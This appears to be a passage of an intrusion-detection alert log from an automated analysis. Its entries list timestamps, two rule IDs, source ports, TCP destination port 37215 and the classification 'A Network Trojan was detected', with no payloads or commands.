                Timestamp:06/14/24-10:43:48.028744
                SID:2829579
                Source Port:59054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760598
                SID:2829579
                Source Port:38232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134741
                SID:2835222
                Source Port:38364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419789
                SID:2835222
                Source Port:47584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677630
                SID:2829579
                Source Port:44884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548851
                SID:2835222
                Source Port:44048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675927
                SID:2829579
                Source Port:46542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290704
                SID:2829579
                Source Port:43138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184079
                SID:2835222
                Source Port:59692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789623
                SID:2829579
                Source Port:38922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056414
                SID:2835222
                Source Port:47086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029329
                SID:2835222
                Source Port:34776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879619
                SID:2829579
                Source Port:38332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830298
                SID:2835222
                Source Port:55526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663363
                SID:2829579
                Source Port:46516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.883213
                SID:2835222
                Source Port:51960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687856
                SID:2829579
                Source Port:34784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023956
                SID:2835222
                Source Port:38178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338209
                SID:2829579
                Source Port:48204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014924
                SID:2829579
                Source Port:47580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899151
                SID:2835222
                Source Port:54834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083796
                SID:2835222
                Source Port:59702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646156
                SID:2829579
                Source Port:60064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453755
                SID:2829579
                Source Port:45712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944438
                SID:2835222
                Source Port:33438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805270
                SID:2829579
                Source Port:57250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565486
                SID:2835222
                Source Port:48466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184294
                SID:2835222
                Source Port:38540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503865
                SID:2829579
                Source Port:33944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133176
                SID:2835222
                Source Port:39364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150342
                SID:2835222
                Source Port:59420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725850
                SID:2835222
                Source Port:45836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074042
                SID:2835222
                Source Port:44322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020729
                SID:2835222
                Source Port:39788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881342
                SID:2829579
                Source Port:59754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.793027
                SID:2829579
                Source Port:34334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164392
                SID:2829579
                Source Port:50162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859816
                SID:2835222
                Source Port:51358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811308
                SID:2829579
                Source Port:54180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914978
                SID:2835222
                Source Port:53678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183222
                SID:2829579
                Source Port:43476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382094
                SID:2835222
                Source Port:58118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914690
                SID:2835222
                Source Port:56804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725141
                SID:2829579
                Source Port:56002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969651
                SID:2829579
                Source Port:43634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862322
                SID:2829579
                Source Port:33420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180573
                SID:2829579
                Source Port:56256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762653
                SID:2829579
                Source Port:34690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148115
                SID:2835222
                Source Port:57002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968813
                SID:2835222
                Source Port:41022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229537
                SID:2829579
                Source Port:38064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943176
                SID:2829579
                Source Port:55766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017679
                SID:2829579
                Source Port:39846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616654
                SID:2835222
                Source Port:58742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879329
                SID:2829579
                Source Port:43438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.516899
                SID:2835222
                Source Port:37410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052490
                SID:2835222
                Source Port:37724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967537
                SID:2835222
                Source Port:43532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017894
                SID:2835222
                Source Port:42864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451340
                SID:2829579
                Source Port:50304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969511
                SID:2835222
                Source Port:48546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641352
                SID:2835222
                Source Port:53640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735486
                SID:2835222
                Source Port:32868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025819
                SID:2835222
                Source Port:32916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.050718
                SID:2835222
                Source Port:58128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.070971
                SID:2829579
                Source Port:57992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988149
                SID:2835222
                Source Port:46002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143418
                SID:2829579
                Source Port:51096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969477
                SID:2829579
                Source Port:33910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857683
                SID:2829579
                Source Port:59988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916616
                SID:2829579
                Source Port:41902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018435
                SID:2829579
                Source Port:38536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132529
                SID:2835222
                Source Port:56152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943937
                SID:2829579
                Source Port:50028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736475
                SID:2829579
                Source Port:53502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777602
                SID:2829579
                Source Port:56806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421967
                SID:2829579
                Source Port:33884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809181
                SID:2835222
                Source Port:45222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075171
                SID:2835222
                Source Port:53576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184513
                SID:2835222
                Source Port:52326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862097
                SID:2829579
                Source Port:35600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563158
                SID:2835222
                Source Port:42166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811765
                SID:2829579
                Source Port:50810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452380
                SID:2829579
                Source Port:49918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179844
                SID:2835222
                Source Port:53248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548117
                SID:2829579
                Source Port:36134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115571
                SID:2835222
                Source Port:44588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846308
                SID:2835222
                Source Port:60164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703900
                SID:2835222
                Source Port:56558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878448
                SID:2835222
                Source Port:44790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761827
                SID:2835222
                Source Port:38244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544925
                SID:2835222
                Source Port:46470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563016
                SID:2829579
                Source Port:48880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518061
                SID:2829579
                Source Port:55258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678262
                SID:2835222
                Source Port:36534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000295
                SID:2835222
                Source Port:44302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811074
                SID:2829579
                Source Port:51370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862065
                SID:2835222
                Source Port:47848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143572
                SID:2835222
                Source Port:37386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001487
                SID:2829579
                Source Port:35748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321746
                SID:2835222
                Source Port:50060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668883
                SID:2829579
                Source Port:34106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420964
                SID:2835222
                Source Port:37112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423783
                SID:2829579
                Source Port:49204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018645
                SID:2829579
                Source Port:58576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276083
                SID:2829579
                Source Port:53838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777519
                SID:2835222
                Source Port:49982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789260
                SID:2829579
                Source Port:51900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501304
                SID:2835222
                Source Port:33764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.566239
                SID:2835222
                Source Port:38630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520637
                SID:2829579
                Source Port:54890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.022183
                SID:2835222
                Source Port:47196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972368
                SID:2835222
                Source Port:45636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616160
                SID:2835222
                Source Port:60500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340849
                SID:2829579
                Source Port:58696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790210
                SID:2835222
                Source Port:34852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766883
                SID:2829579
                Source Port:51814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292395
                SID:2835222
                Source Port:58204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804433
                SID:2829579
                Source Port:58936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827898
                SID:2829579
                Source Port:47526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966273
                SID:2835222
                Source Port:45910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294931
                SID:2835222
                Source Port:40388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045578
                SID:2829579
                Source Port:50190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250661
                SID:2835222
                Source Port:35580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.722182
                SID:2829579
                Source Port:57080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410658
                SID:2835222
                Source Port:46426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368491
                SID:2835222
                Source Port:42606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469646
                SID:2835222
                Source Port:53458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646746
                SID:2835222
                Source Port:52170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132467
                SID:2829579
                Source Port:36006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520569
                SID:2829579
                Source Port:58920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705246
                SID:2829579
                Source Port:37232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473551
                SID:2835222
                Source Port:39978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520371
                SID:2829579
                Source Port:39066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150037
                SID:2835222
                Source Port:56960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384115
                SID:2829579
                Source Port:47598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149876
                SID:2829579
                Source Port:57140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183628
                SID:2829579
                Source Port:60138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.335331
                SID:2835222
                Source Port:58460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861895
                SID:2829579
                Source Port:43724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150031
                SID:2829579
                Source Port:43628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765882
                SID:2829579
                Source Port:58990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734961
                SID:2829579
                Source Port:37760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546772
                SID:2835222
                Source Port:47430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766418
                SID:2829579
                Source Port:49770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970729
                SID:2835222
                Source Port:53704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274576
                SID:2835222
                Source Port:54624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519574
                SID:2835222
                Source Port:53366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019924
                SID:2835222
                Source Port:60244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277584
                SID:2829579
                Source Port:43760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031536
                SID:2835222
                Source Port:56020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666331
                SID:2835222
                Source Port:41534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804229
                SID:2829579
                Source Port:44938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998206
                SID:2829579
                Source Port:56602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010002
                SID:2829579
                Source Port:47092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670042
                SID:2829579
                Source Port:57830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727269
                SID:2829579
                Source Port:33086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024310
                SID:2829579
                Source Port:45738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977014
                SID:2835222
                Source Port:34542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292523
                SID:2835222
                Source Port:35552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979375
                SID:2829579
                Source Port:55114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055171
                SID:2829579
                Source Port:48336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563545
                SID:2835222
                Source Port:53626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289836
                SID:2829579
                Source Port:53462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146685
                SID:2829579
                Source Port:60742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450602
                SID:2835222
                Source Port:36200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504276
                SID:2835222
                Source Port:56184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790955
                SID:2835222
                Source Port:56050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503663
                SID:2835222
                Source Port:39438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179113
                SID:2835222
                Source Port:46896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666788
                SID:2835222
                Source Port:49684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470383
                SID:2829579
                Source Port:50408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849887
                SID:2835222
                Source Port:35300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030255
                SID:2829579
                Source Port:57016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001829
                SID:2829579
                Source Port:55468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134949
                SID:2829579
                Source Port:51294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790177
                SID:2835222
                Source Port:57428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199854
                SID:2829579
                Source Port:33518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326490
                SID:2835222
                Source Port:55660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340295
                SID:2835222
                Source Port:41406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545577
                SID:2835222
                Source Port:46750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914348
                SID:2835222
                Source Port:39090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618521
                SID:2829579
                Source Port:33278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149934
                SID:2829579
                Source Port:49012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732903
                SID:2835222
                Source Port:37290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409600
                SID:2835222
                Source Port:41538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382949
                SID:2829579
                Source Port:36076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407184
                SID:2835222
                Source Port:44006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178912
                SID:2835222
                Source Port:43326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.088990
                SID:2829579
                Source Port:53732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132379
                SID:2835222
                Source Port:51392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178015
                SID:2829579
                Source Port:47832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.252964
                SID:2835222
                Source Port:48462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029789
                SID:2835222
                Source Port:56368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115741
                SID:2829579
                Source Port:39644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470727
                SID:2829579
                Source Port:35990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849569
                SID:2835222
                Source Port:57976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472725
